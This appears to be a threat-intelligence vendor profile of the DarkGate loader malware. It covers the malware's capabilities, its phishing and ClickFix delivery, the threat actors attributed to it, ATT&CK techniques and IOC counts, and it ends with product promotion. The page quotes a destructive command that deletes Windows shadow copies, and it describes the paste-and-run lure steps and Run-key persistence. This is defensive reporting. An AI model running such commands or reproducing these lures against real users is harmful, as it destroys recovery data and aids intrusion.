DarkGate
DarkGate is a commercial loader malware family with infostealing and post-compromise functionality. The provided content states that it can load and execute files in memory and includes capabilities such as HVNC, keylogging, information theft, privilege escalation, clipboard capture, and credential theft. On execution, DarkGate starts a thread that captures clipboard data and logs it to a predefined file. It searches for stored credentials associated with cryptocurrency wallets, notifies its command-and-control server when such credentials are identified, and uses existing C2 channels to retrieve captured wallet credentials. Some versions use Nirsoft Network Password Recovery or NetPass to steal stored RDP credentials. DarkGate also queries system locale information during execution; later versions call GetSystemDefaultLCID to determine whether the malware is running in Russian-speaking countries. For defense evasion, it can terminate processes associated with several security software products. For impact and recovery inhibition, it can delete system restore points via "cmd.exe /c vssadmin delete shadows /for=c: /all /quiet". During initial installation, DarkGate drops several files into a hidden directory named after the victim machine.
The content associates DarkGate primarily with phishing- and social-engineering-based delivery. Reported infection vectors include phishing emails with malicious attachments from spoofed senders, phishing links to VBS or MSI payloads requiring user interaction, pirated-media lures, malicious LNK-based delivery, and ClickFix or paste-and-run campaigns in which victims are tricked into copying and executing malicious PowerShell commands. A cited campaign used CVE-2024-21412 together with fake software installers impersonating Apple iTunes, Notion, NVIDIA, and others to bypass Microsoft Defender SmartScreen protections and infect users with DarkGate. The malware is also described as being distributed by TA571 and fake update activity sets, and as a payload used by UNC4393-linked access chains after the QAKBOT takedown. The content further notes DarkGate as a malware family observed in campaigns and distribution ecosystems involving Proofpoint-tracked ClickFix activity, phishing operations, and other malware delivery clusters.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Vulnerabilities exploited
1 CVE Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
CISA noted that the vulnerability can be chained with CVE-2024-21412 during attacks... CVE-2024-21412 was used as part of a DarkGate campaign that leveraged fake software installers impersonating Apple’s iTunes, Notion, NVIDIA and more. | “CVE-2024-21412 was used as part of a DarkGate campaign that leveraged fake software installers impersonating Apple’s iTunes, Notion, NVIDIA and more. Microsoft Defender SmartScreen is supposed to provide additional protections for end users against phishing and malicious websites. However, as the name implies, these flaws bypass these security features, which leads to end users being infected with malware.”
Groups observed using it
6 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
In addition, TA571 has been associated with the distribution of other malware families, including variants of IcedID, NetSupportRAT, DarkGate and others.
In late 2023, several months after the QAKBOT infrastructure takedown by the FBI and the United States Justice Department, UNC4393 began leveraging other distribution clusters for initial access, specifically those delivering DARKGATE, again via phishing.
The attackers typically use targeted phishing emails with malicious files disguised as legitimate documents to gain initial access, and deploy backdoors such as BrockenDoor, as well as other malware including Remcos and DarkGate.
A DarkGate v6 sample delivered inside an IExpress self-extracting archive was fully unpacked through a five-layer decryption chain -- from IExpress cabinet to obfuscated batch script to AutoIt3 loader (2,462 encrypted strings) to RC4+LZNT1 payload decryption to process hollowing injection into explorer.exe.
These emails contained HTML attachments that attempted to install DarkGate, a commodity loader that is capable of keylogging, cryptocurrency mining, establishing C2 communications, and downloading additional malicious payloads, among others.
Techniques & procedures
28 distinct techniques documented for this family, organized by ATT&CK tactic.
Reconnaissance
1 technique
Reconnaissance
Initial Access
2 techniques
Initial Access
Execution
5 techniques
Execution
We’ve been observing an initial access technique that tricks users into copying, pasting, and executing malicious PowerShell code... users are presented with the typical Verify You Are Human prompt... Clicking the button silently copies an obfuscated PowerShell command to the clipboard and presents the user with “Verification Steps” instructing them to: Press Windows Button + R... Press CTRL + V... Press Enter. | One technique we’ve recently seen lead to LummaC2 involves tricking users into copying a PowerShell script from a pop-up message, pasting it into the Windows Run dialogue box, and executing malicious PowerShell code.
the malicious PowerShell/CMD script is copied to the clipboard via browser-side JavaScript
On Tuesday, the agency added CVE-2024-29988 to the list. The vulnerability was unveiled by Microsoft as part of the Patch Tuesday releases in April and affects Microsoft SmartScreen ... He added that the bug is popular among attackers that use a file download as part of their attack techniques for gaining initial access because they “want to find ways to bypass the security features such as SmartScreen.”
DarkHydrus has sent malware that required users to hit the enable button in Microsoft Excel to allow an .iqy file to be downloaded... TA505 has used lures to get users to enable content in malicious attachments and execute malicious files contained in archives.
Sandworm Team leveraged Microsoft Office attachments which contained malicious macros that were automatically executed once the user permitted them... APT29 has used various forms of spearphishing attempting to get a user to open attachments... DarkGate is distributed through phishing links to VBS or MSI objects requiring user interaction for execution.
Persistence
3 techniques
Persistence
Across the content, malware repeatedly 'adds Registry Run keys', 'creates Registry entries', 'modifies the Windows Registry', or 'overwrites registry keys' to maintain persistence.
The content repeatedly describes malware and threat actors establishing persistence by adding values under HKCU/HKLM\Software\Microsoft\Windows\CurrentVersion\Run or RunOnce, and by placing executables, scripts, or .lnk files in the Startup folder. | Examples include malware copied to '%AppData%\Microsoft\Windows\Start Menu\Programs\Startup', creation of '.lnk' shortcuts in Startup, and scripts or batch files placed in Startup folders. | Examples include: 'APT18 establishes persistence via the HKCU\Software\Microsoft\Windows\CurrentVersion\Run key'; 'APT28 has deployed malware that has copied itself to the startup directory for persistence'; 'FIN7 malware has created Registry Run and RunOnce keys to establish persistence, and has also added items to the Startup folder.'
Privilege Escalation
2 techniques
Privilege Escalation
The content repeatedly describes malware and threat actors establishing persistence by adding values under HKCU/HKLM\Software\Microsoft\Windows\CurrentVersion\Run or RunOnce, and by placing executables, scripts, or .lnk files in the Startup folder. | Examples include malware copied to '%AppData%\Microsoft\Windows\Start Menu\Programs\Startup', creation of '.lnk' shortcuts in Startup, and scripts or batch files placed in Startup folders. | Examples include: 'APT18 establishes persistence via the HKCU\Software\Microsoft\Windows\CurrentVersion\Run key'; 'APT28 has deployed malware that has copied itself to the startup directory for persistence'; 'FIN7 malware has created Registry Run and RunOnce keys to establish persistence, and has also added items to the Startup folder.'
Stealth
6 techniques
Stealth
The content contains many examples of base64, XOR, RC4, AES, Rijndael, custom ciphers, rolling XOR, and multi-layer obfuscation used to hide payloads, strings, scripts, and C2 data.
CVE-2024-21412 was used as part of a DarkGate campaign that leveraged fake software installers impersonating Apple’s iTunes, Notion, NVIDIA and more.
The content repeatedly describes malware and threat actors decoding, decrypting, deobfuscating, or unpacking payloads, strings, configuration data, commands, and C2 responses prior to execution or use.
An encoded PowerShell command then leverages Microsoft HTML Application Host (mshta.exe) to download and execute a malicious payload from a remote resource... Detection opportunity: mshta.exe utility making external network connections.
Several entries describe malware examining running processes to determine if a debugger, sandbox, virtual environment, or analysis/security tools are present, such as AsyncRAT checking for a debugger, RogueRobin enumerating Wireshark and Sysinternals processes, and P8RAT checking for processes associated with virtual environments.
Agent Tesla has created hidden folders. AppleJeus has added a leading . to plist filenames, unlisting them from the Finder app and default Terminal directory listings. APT28 has saved files with hidden file attributes. FIN13 has created hidden files and folders within a compromised Linux system /tmp directory and also used attrib.exe to hide gathered local host information.
Defense Impairment
1 technique
Defense Impairment
Credential Access
2 techniques
Credential Access
DarkGate searches for stored credentials associated with cryptocurrency wallets... StrelaStealer attempts to identify and collect mail login data from Thunderbird and Outlook... Valak can download a module to search for and build a report of harvested credential data.
Discovery
4 techniques
Discovery
The content repeatedly describes malware and threat actors obtaining lists of running processes, using utilities such as tasklist, ps, WMI, Get-Process, CreateToolhelp32Snapshot, EnumProcesses, and similar APIs/commands to enumerate active processes on victim systems.
The content repeatedly describes malware and threat actors collecting host details such as OS version, hostname, architecture, CPU, memory, BIOS, domain, language, and other configuration data; e.g., "APT41 uses multiple built-in commands such as systeminfo and net config Workstation to enumerate victim system basic configuration information."
The content repeatedly describes malware and threat actors listing files and directories, enumerating drives, searching for files by extension/name/path, retrieving file metadata, and browsing file systems (for example: "APT28 has used Forfiles to locate PDF, Excel, and Word documents during collection" and "cmd can be used to find files and directories with native functionality such as dir commands").
Several entries describe malware examining running processes to determine if a debugger, sandbox, virtual environment, or analysis/security tools are present, such as AsyncRAT checking for a debugger, RogueRobin enumerating Wireshark and Sysinternals processes, and P8RAT checking for processes associated with virtual environments.
Collection
3 techniques
Collection
Agent Tesla can steal data from the victim’s clipboard. APT38 used a Trojan called KEYLIME to collect data from the clipboard. APT39 has used tools capable of stealing contents of the clipboard.
Agrius used a custom tool, sql.net4.exe, to query SQL databases and then identify and extract personally identifiable information... AppleSeed has automatically collected data from USB drives, keystrokes, and screen images before exfiltration... Ember Bear engages in mass collection from compromised systems during intrusions.
Command and Control
1 technique
Command and Control
Exfiltration
1 technique
Exfiltration
ADVSTORESHELL exfiltrates data over the same channel used for C2... Agrius exfiltrated staged data using tools such as Putty and WinSCP, communicating with command and control servers... numerous malware and groups sent victim data, files, credentials, or host information over existing C2 channels.
IOCs tracked for this family
69 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
137 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Referenced as a comparable loader family that uses AutoIt, RC4, RunPE hollowing, and ntdll restoration. In this content it serves as a comparison point for Eimeria’s architecture.
Malware used by BO Team as part of phishing-based operations to establish or expand access in victim environments.
Malware used in a staged, modular campaign where malicious Excel files fetched VBS or JS from public SMB shares, then executed commands to download PowerShell scripts and additional malware components including obfuscated shellcode and AutoHotKey-based executables.
DarkGate is described as a technically sophisticated MaaS malware that uses a multi-stage execution chain, anti-analysis checks, NTDLL unhooking, RC4+LZNT1 payload decryption, and process hollowing into explorer.exe or TapiUnattend.exe. In this sample it runs in-memory, performs HTTP-based C2 communication, and is configured for core C2 communication and credential theft.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.